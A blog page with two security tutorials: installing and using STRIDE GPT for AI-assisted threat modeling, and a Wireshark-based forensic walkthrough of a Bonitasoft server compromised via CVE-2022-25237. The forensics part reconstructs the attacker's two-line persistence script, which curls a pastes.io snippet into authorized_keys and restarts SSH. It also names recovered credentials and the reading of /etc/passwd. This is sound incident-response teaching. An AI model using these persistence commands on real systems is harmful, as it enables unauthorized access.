
Using Artificial Intelligence (AI) in Cybersecurity: Automate Threat Modeling with STRIDE GPT

28 November 2025 at 09:48

Welcome back, aspiring cyberwarriors!

The STRIDE methodology has been the gold standard for systematic threat identification, categorizing threats into Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. However, applying STRIDE effectively requires not just understanding these categories but also having the experience to identify how they manifest in specific application architectures.

To solve this problem, we have STRIDE GPT. By combining the analytical power of AI with the proven STRIDE methodology, this tool can generate comprehensive threat models, attack trees, and mitigation strategies in minutes rather than hours or days.

In this article, we’ll walk you through how to install STRIDE GPT, check out its features, and get you started using them. Let’s get rolling!

Step #1: Install STRIDE GPT

First, make certain you have Python 3.8 or later installed on your system.

pi > python3 --version

Now, clone the STRIDE GPT repository from GitHub.

pi > git clone https://github.com/mrwadams/stride-gpt.git

pi> cd stride-gpt

Next, install the required Python dependencies.

pi > pip3 install -r requirements.txt --break-system-packages

This installation process may take a few minutes.
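If you would rather not pass --break-system-packages, a Python virtual environment is a common alternative that keeps the dependencies isolated from your system packages (this is an optional variation, not part of the original steps):

pi > python3 -m venv venv

pi > source venv/bin/activate

pi > pip3 install -r requirements.txt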

Step #2: Configure Your Groq API Key

STRIDE GPT supports multiple AI providers including OpenAI, Anthropic, Google AI, Mistral, and Groq, as well as local hosting options through Ollama and LM Studio Server. In this example, I’ll be using Groq. Groq provides access to models like Llama 3.3 70B, DeepSeek R1, and Qwen3 32B through their Language Processing Units (LPUs), which deliver inference speeds significantly faster than traditional GPU-based solutions. Besides that, Groq’s API is cost-effective compared to proprietary models.

To use STRIDE GPT with Groq, you need to obtain an API key from Groq. The tool supports loading API keys through environment variables, which is the most secure method for managing credentials. In the stride-gpt directory, you’ll find a file named .env.example. Copy this file to create your own .env file:

pi > cp .env.example .env

Now, open the .env file in your preferred text editor and add the API key.
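For reference, a Groq entry typically looks like the line below. The exact variable name is defined in .env.example, so confirm it there; the value shown is only a placeholder:

GROQ_API_KEY=your_groq_api_key_here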

Step #3: Launch STRIDE GPT

Start the application by running:

pi> python3 -m streamlit run main.py

Streamlit will start a local web server and print its URL in the terminal (by default, http://localhost:8501).

Open that URL in your browser and you will see a dashboard similar to the one shown below.

In the STRIDE GPT sidebar, you’ll see a dropdown menu labeled “Select Model Provider”. Click on this dropdown and you’ll see options for OpenAI, Azure OpenAI, Google AI, Mistral AI, Anthropic, Groq, Ollama, and LM Studio Server.

Select “Groq” from this list. The interface will update to show Groq-specific configuration options. You’ll see a field for entering your API key. If you configured the .env file correctly in Step 2, this field should already be populated with your key. If not, you can enter it directly in the interface, though this is less secure and the key will only persist for your current session.

Below the API key field, you’ll see a dropdown for selecting the specific Groq model you want to use. For this tutorial, I selected Llama 3.3 70B.

Step #4: Describe Your Application

Now comes the critical part where you provide information about the application you want to threat model. The quality and comprehensiveness of your threat model depends heavily on the detail you provide in this step.

In the main area of the interface, you’ll see a text box labeled “Describe the application to be modelled”. This is where you provide a description of your application’s architecture, functionality, and security-relevant characteristics.

Let’s work through a practical example. Suppose you’re building a web-based project management application. Here’s the kind of description you should provide:

“This is a web-based project management application built with a React frontend and a Node.js backend API. The application uses JWT tokens for authentication, with tokens stored in HTTP-only cookies. Users can create projects, assign tasks to team members, upload file attachments, and generate reports. The application is internet-facing and accessible to both authenticated users and unauthenticated visitors who can view a limited public project showcase. The backend connects to a PostgreSQL database that stores user credentials, project data, task information, and file metadata. Actual file uploads are stored in an AWS S3 bucket. The application processes sensitive data including user email addresses, project details that may contain confidential business information, and file attachments that could contain proprietary documents. The application implements role-based access control with three roles: Admin, Project Manager, and Team Member. Admins can manage users and system settings, Project Managers can create and manage projects, and Team Members can view assigned tasks and update their status.”

The more specific you are, the more targeted and actionable your threat model will be.

Besides that, near the application description field, you’ll see several dropdowns that help STRIDE GPT understand your application’s security context.

Step #5: Generate Your Threat Model

With all the configuration complete and your application described, you’re ready to generate your threat model. Look for a button labeled “Generate Threat Model” and click it.

Once complete, you’ll see a comprehensive threat model organized by the STRIDE categories. For each category, the model will identify specific threats relevant to your application. Let’s look at what you might see for our project management application example:

Each threat includes a detailed description explaining how the attack could be carried out and what the impact would be.

Step #6: Generate an Attack Tree

Beyond the basic threat model, STRIDE GPT can generate attack trees that visualize how an attacker might chain multiple vulnerabilities together to achieve a specific objective.

The tool generates these attack trees in Mermaid diagram format, which renders as an interactive visual diagram directly in your browser.

Step #7: Review DREAD Risk Scores

STRIDE GPT implements the DREAD risk scoring model to help you prioritize which threats to address first.

The tool will analyze each threat and assign scores from 1 to 10 for five factors:

Damage: How severe would the impact be if the threat were exploited?

Reproducibility: How easy is it to reproduce the attack?

Exploitability: How much effort and skill would be required to exploit the vulnerability?

Affected Users: How many users would be impacted?

Discoverability: How easy is it for an attacker to discover the vulnerability?

The DREAD assessment appears in a table format showing each threat, its individual factor scores, and its overall risk score.
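To make the aggregation concrete, here is a minimal Python sketch that rolls the five factor scores into an overall risk score. It assumes the common DREAD convention of averaging the factors; STRIDE GPT’s exact formula may differ, and the example threat is hypothetical.

# Minimal DREAD aggregation sketch, assuming the common "average of five
# 1-10 factor scores" convention. STRIDE GPT's exact formula may differ.

def dread_score(damage, reproducibility, exploitability, affected_users, discoverability):
    """Return the overall DREAD risk score as the mean of the five factors."""
    factors = [damage, reproducibility, exploitability, affected_users, discoverability]
    if not all(1 <= f <= 10 for f in factors):
        raise ValueError("each DREAD factor must be between 1 and 10")
    return sum(factors) / len(factors)

# Hypothetical threat: "JWT token theft via XSS" in the project management app
print(dread_score(damage=8, reproducibility=6, exploitability=7,
                  affected_users=9, discoverability=5))  # -> 7.0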

Step #8: Generate Mitigation Strategies

Identifying threats is only half the battle. You also need actionable guidance on how to address them. STRIDE GPT includes a feature to generate specific mitigation strategies for each identified threat.

Look for a button labeled “Mitigations” and click it.

These mitigation strategies are specific to your application’s architecture and the threats identified. They’re not generic security advice but targeted recommendations based on the actual risks in your system.

Step #9: Generate Gherkin Test Cases

One of the most innovative features of STRIDE GPT is its ability to generate Gherkin test cases based on the identified threats. Gherkin is a business-readable, domain-specific language used in Behavior-Driven Development to describe software behaviors without detailing how that behavior is implemented. These test cases can be integrated into your automated testing pipeline to ensure that the mitigations you implement actually work.

Look for a button labeled “Generate Test Cases”. When you click it, STRIDE GPT will create Gherkin scenarios for each major threat.
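To give you a sense of the format, here is a hypothetical Gherkin scenario in the Given/When/Then style for the project management example. It is an illustration only, not actual STRIDE GPT output:

Feature: Role-based access control
  Scenario: Team Member cannot change project settings
    Given a user is authenticated with the Team Member role
    When the user sends a request to update the project settings
    Then the API responds with 403 Forbidden
    And the project settings remain unchanged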

Summary

Traditional threat modeling takes a lot of time and requires experts, which stops many organizations from doing it well. STRIDE GPT makes threat modeling accessible to everyone by using AI to automate the analysis while preserving the rigor of the proven STRIDE methodology.

In this article, we installed STRIDE GPT and went over its main features. Whether you’re protecting a basic web app or a complex microservices setup, STRIDE GPT gives you the analytical tools you need to spot and tackle security threats in a straightforward way.

Network Forensics: Analyzing a Server Compromise (CVE-2022-25237)

24 October 2025 at 10:34

Welcome back, aspiring forensic and incident response investigators.

Today we are going to explore Network Forensics, the branch of digital forensics that focuses on network traffic. This field often yields a wealth of valuable evidence: even when skilled attackers evade endpoint controls, their activity is much harder to hide from a network capture. Many of the attacker’s actions generate traffic that gets recorded. Intrusion detection and prevention systems (IDS/IPS) can also surface malicious activity quickly, although not every organization deploys them. In this exercise you will see what can be extracted from IDS/IPS logs and a packet capture during a network forensic analysis.

The incident we will investigate today involved a credential-stuffing attempt followed by exploitation of CVE-2022-25237. The attacker abused an API to run commands and establish persistence. Below are the details of the analysis, followed by a timeline of the attack.

Intro

Our subject is a fast-growing startup that uses a business management platform. Documentation for that platform is limited, and the startup administrators have not followed strong security practices. For this exercise we act as the security team. Our objective is to confirm the compromise using network packet captures (PCAP) and exported security logs.

We obtained an archive containing the artifacts needed for the investigation. It includes a .pcap network traffic file and a .json file with security events. Wireshark will be our primary analysis tool.

network artifacts for the analysis

Analysis

Defining Key IP Addresses

The company suspects its management platform was breached. To identify which platform and which hosts are involved, we start with the pcap file. In Wireshark, view the TCP endpoints from the Statistics menu and sort by packet count to see which IP addresses dominate the capture.

endpoints in wireshark with higher reception

This quickly highlights the IP address 172.31.6.44 as a major recipient of traffic. The traffic to that host uses ports 37022, 8080, 61254, 61255, and 22. Common service associations for these ports are: 8080 for HTTP, 22 for SSH, and 37022 as an arbitrary TCP data port that the environment is using.
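If you prefer the command line, tshark can produce the same per-endpoint statistics; the capture filename below is an assumption, so substitute your own:

bash$ > tshark -r capture.pcap -q -z endpoints,tcp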

When you identify heavy talkers in a capture, export their connection lists and timestamps immediately. That gives you a focused subset to work from and preserves the context of later findings.

Analyzing HTTP Traffic

The port usage suggests the management platform is web-based. Filter HTTP traffic in Wireshark with http.request to inspect client requests. The first notable entry is a GET request whose URL and headers match Bonitasoft’s platform, showing the company uses Bonitasoft for business management.

http traffic that looks like brute force

Below that GET request you can see a series of authentication attempts (POST requests) originating from 156.146.62.213. The login attempts include usernames that reveal the attacker has done corporate OSINT and enumerated staff names.

The credentials used in the attack are not generic wordlist guesses; instead, the attacker tries a focused set of credentials. That behavior is consistent with credential stuffing: the attacker takes previously leaked username/password pairs (often from other breaches) and tries them against this service, typically in an automated fashion and sometimes distributed via a botnet to blend with normal traffic.

credential stuffing spotted

A credential-stuffing event alone does not prove a successful compromise. The next step is to check whether any of the login attempts produced a successful authentication. Before doing that, we review the IDS/IPS alerts.

Finding the CVE

To inspect the JSON alert file in a shell environment, format it with jq so the output is easier to read:

bash$ > cat alerts.json | jq .

reading alert log file

Obviously, the output is far too large to review line by line, so we narrow it down to indicators such as CVE identifiers:

bash$ > cat alerts.json | jq . | grep -i cve

grepping cves in the alert log file

Security tools often map detected signatures to known CVE identifiers. In our case, alert data and correlation with the observed HTTP requests point to repeated attempts to exploit CVE-2022-25237, a vulnerability affecting Bonita Web 2021.2. The vulnerability stems from an overly broad exclusion pattern in the RestAPIAuthorizationFilter: by appending an i18ntranslation suffix to a URL, an unprivileged user can reach privileged API endpoints, potentially leading to remote code execution or privilege escalation.

cve 2022-25237 information

Now we verify whether exploitation actually succeeded.

Exploitation

To find successful authentications, filter responses with:

http.response.code >= 200 and http.response.code < 300 and ip.addr == 172.31.6.44

filtering http responses with successful authentication

Among the successful responses, HTTP 204 entries stand out because they are less common than HTTP 200. If we follow the HTTP stream for a 204 response, the request stream shows valid credentials followed immediately by a 204 response and cookie assignment. That means the attacker successfully logged in. This is the point where the attacker moves from probing to interacting with privileged endpoints.

finding a successful authentication
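To isolate those responses quickly, you can tighten the display filter to 204s only (addresses taken from earlier in this analysis):

http.response.code == 204 and ip.addr == 172.31.6.44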

After authenticating, the attacker targets the API to exploit the vulnerability. In the traffic we can see an upload of rce_api_extension.zip, which enables remote code execution. Later, the attacker deletes this zip file to cover their tracks.

finding the api abuse after the authentication
attacker uploaded a zip file to abuse the api

Following the upload, we can observe commands executed on the server. The attacker reads /etc/passwd and runs whoami. In the output we see access to sensitive system information.

reading the passwd file
the attacker assessing his privileges

During a forensic investigation you should extract the uploaded files from the capture or request the original file from the source system (if available). Analyzing the uploaded code is essential to understand the compromise and to find indicators of lateral movement or backdoors.
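One practical way to recover the uploaded archive is Wireshark’s File > Export Objects > HTTP dialog, or the equivalent tshark command; the capture filename and output directory below are assumptions:

bash$ > tshark -r capture.pcap --export-objects http,exported_objects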

Persistence

After initial control, attackers typically establish persistence. In this incident, all attacker activity is over HTTP, so we follow subsequent HTTP requests to find persistence mechanisms.

the attacker establishes persistence with pastes.io

The attacker downloads a script hosted on a paste service (pastes.io), named bx6gcr0et8. When executed, this script retrieves another snippet, hffgra4unv, and appends its contents to /home/ubuntu/.ssh/authorized_keys. The attacker then restarts SSH to apply the new key.
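Based on the behaviour observed in the capture, the downloaded script likely amounted to something like the two lines below. This is a reconstruction, not the recovered file; the exact URL path and restart command may differ:

curl -s https://pastes.io/raw/hffgra4unv >> /home/ubuntu/.ssh/authorized_keys
sudo service ssh restart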

reading the bash script used to establish persistence

A few lines below we can see that the first script was executed via bash, completing the persistence setup.

the persistence script is executed

Appending keys to authorized_keys allows SSH access for the attacker’s key pair and doesn’t require a password. It’s a stealthy persistence technique that avoids adding new files that antivirus might flag. In this case the attacker relied on built-in Linux mechanisms rather than installing malware.

When you find modifications to authorized_keys, pull the exact key material from the capture and compare it with known attacker keys or with subsequent SSH connection fingerprints. That helps attribute later logins to this initial persistence action.
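For example, once you have carved the public key out of the capture, you can fingerprint it for comparison with later SSH sessions (the filename here is hypothetical):

bash$ > ssh-keygen -lf attacker_key.pub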

MITRE ATT&CK SSH Authorized Keys information

Post-Exploitation

Further examination of the pcap shows the server reaching out to Ubuntu repositories to download a .deb package that contains Nmap. 

attacker downloads a deb file with nmap

Shortly after SSH access is obtained, we see traffic from a second IP address, 95.181.232.30, connecting over port 22. Correlating timestamps shows the command to download the .deb package was issued from that SSH session. Once Nmap is present, the attacker performs a port scan of 34.207.150.13.

attacker performs nmap scan
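A quick way to confirm the scan in the capture is to filter for outbound SYN packets from the compromised host to the scanned target (addresses taken from this capture; the filter itself is standard Wireshark syntax):

tcp.flags.syn == 1 and tcp.flags.ack == 0 and ip.src == 172.31.6.44 and ip.dst == 34.207.150.13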

This sequence of adding an SSH key, then using that access to install reconnaissance tools and scan other hosts, fits a common post-exploitation pattern: attackers establish persistent access, stage tools, and then enumerate the network for lateral movement opportunities.

During forensic investigations, save the sequence of timestamps that link file downloads, package installation, and scanning activity. Those correlations are important for incident timelines and for identifying which sessions performed which actions.

Timeline

At the start, the attacker attempted credential stuffing against the management server. Successful login occurred with the credentials seb.broom / g0vernm3nt. After authentication, the attacker exploited CVE-2022-25237 in Bonita Web 2021.2 to reach privileged API endpoints and uploaded rce_api_extension.zip. They then executed commands such as whoami and cat /etc/passwd to confirm privileges and enumerate users.

The attacker removed rce_api_extension.zip from the web server to reduce obvious traces. Using pastes.io from IP 138.199.59.221, the attacker executed a bash script that appended data to /home/ubuntu/.ssh/authorized_keys, enabling SSH persistence (MITRE ATT&CK: SSH Authorized Keys, T1098.004). Shortly after persistence was established, an SSH connection from 95.181.232.30 issued commands to download a .deb package containing Nmap. The attacker used Nmap to scan 34.207.150.13 and then terminated the SSH session.

Conclusion

During our network forensics exercise we saw how packet captures and IDS/IPS logs can reveal the flow of a compromise, from credential stuffing, through exploitation of a web-application vulnerability, to command execution and persistence via SSH keys. We practiced using Wireshark to trace HTTP streams, observed credential stuffing in action, and followed the attacker’s persistence mechanism.

Although our class focused on analysis, in real incidents you should always preserve originals and record every artifact with exact timestamps. Create cryptographic hashes of artifacts, maintain a chain of custody, and work only on copies. These steps protect the integrity of evidence and are essential if the incident leads to legal action.

For those of you interested in deepening your digital forensics skills, we will be running a practical SCADA forensics course in November. This intensive, hands-on course teaches forensic techniques specific to Industrial Control Systems and SCADA environments, showing you how to collect and preserve evidence from PLCs, RTUs, HMIs, and engineering workstations, reconstruct attack chains, and identify indicators of compromise in OT networks. Practical OT/SCADA skills are rare and highly valued, and the course’s focus on real-world labs and breach simulations will make your CV stand out.

We also offer digital forensics services for organizations and individuals. Contact us to discuss your case and which services suit your needs.

Learn more: https://hackersarise.thinkific.com/courses/scada-forensics

